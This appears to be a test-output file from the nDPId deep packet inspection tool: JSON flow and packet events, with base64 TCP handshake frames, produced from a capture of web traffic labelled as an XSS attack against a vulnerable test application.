+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347224338,"flow_last_seen":1499347224338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347224338,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1499347224338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347224338,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K5xAAD4GmjSsEAABwKgKMtaEAFDFiskTAAAAAKACchAVyAAAAgQFtAQCCAoBOeKPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1499347224338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347224338,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1oTh1R3txYrJFKAScSBe+gAAAgQFtAQCCAoD47QGATnijwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2140,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1499347224339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347224339,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K51AAD4GmjusEAABwKgKMtaEAFDFiskU4dUd7oAQAOX+AAAAAQEICgE54pAD47QG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347225590,"flow_last_seen":1499347225590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347225590,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1499347225590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347225590,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hTdAAD4GQJmsEAABwKgKMtaSAFC4kmb\/AAAAAKACchCDjQAAAgQFtAQCCAoBOePIAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1499347225590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347225590,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1pJbUfWYuJJnAKAScSB6XwAAAgQFtAQCCAoD47U\/ATnjyAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1499347225591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347225591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hThAAD4GQKCsEAABwKgKMtaSAFC4kmcAW1H1mYAQAOUZZgAAAQEICgE548kD47U\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347228091,"flow_last_seen":1499347228091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347228091,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1499347228091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347228091,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p6lAAD4GHiesEAABwKgKMtasAFAs20GTAAAAAKACchAyJQAAAgQFtAQCCAoBOeY6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1499347228091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347228091,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1qzT8idALNtBlKAScSB8PQAAAgQFtAQCCAoD47ewATnmOgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":1499347228092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347228092,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p6pAAD4GHi6sEAABwKgKMtasAFAs20GU0\/InQYAQAOUbRQAAAQEICgE55joD47ew"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347229416,"flow_last_seen":1499347229416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347229416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1499347229416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347229416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aTtAAD4GXJWsEAABwKgKMta6AFA5aI6+AAAAAKACchDXEwAAAgQFtAQCCAoBOeeFAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1499347229417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347229417,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1rr5YE9wOWiOv6AScSDSQgAAAgQFtAQCCAoD47j7ATnnhQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1499347229417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347229417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aTxAAD4GXJysEAABwKgKMta6AFA5aI6\/+WBPcYAQAOVxSgAAAQEICgE554UD47j7"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347230690,"flow_last_seen":1499347230690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347230690,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1499347230690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uy1AAD4GCqOsEAABwKgKMtbIAFCbKFPuAAAAAKACchCu1wAAAgQFtAQCCAoBOejDAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1499347230690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1shnmPeomyhT76AScSCSVwAAAgQFtAQCCAoD47o6ATnowwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1499347230691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347230691,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uy5AAD4GCqqsEAABwKgKMtbIAFCbKFPvZ5j3qYAQAOUxXgAAAQEICgE56MQD47o6"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347233219,"flow_last_seen":1499347233219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347233219,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1499347233219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347233219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Fw9AAD4GrsGsEAABwKgKMtbiAFBsKfwzAAAAAKACchAy\/gAAAgQFtAQCCAoBOes8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2215,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1499347233219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347233219,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1uJkUL6IbCn8NKAScSBQbgAAAgQFtAQCCAoD47yyATnrPAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1499347233220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347233220,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FxBAAD4GrsisEAABwKgKMtbiAFBsKfw0ZFC+iYAQAOXvdQAAAQEICgE56zwD47yy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347234469,"flow_last_seen":1499347234469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347234469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1499347234469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347234469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vaZAAD4GCCqsEAABwKgKMtbwAFD38VHSAAAAAKACchBQUQAAAgQFtAQCCAoBOex0AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1499347234469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347234469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1vAPBPjT9\/FR06AScSCHigAAAgQFtAQCCAoD473qATnsdAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1499347234470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347234470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vadAAD4GCDGsEAABwKgKMtbwAFD38VHTDwT41IAQAOUmkgAAAQEICgE57HQD473q"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347235716,"flow_last_seen":1499347235716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347235716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1499347235716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347235716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wLxAAD4GBRSsEAABwKgKMtb+AFAtaC0QAAAAAKACchA+VwAAAgQFtAQCCAoBOe2sAAAAAAEDAwc="} 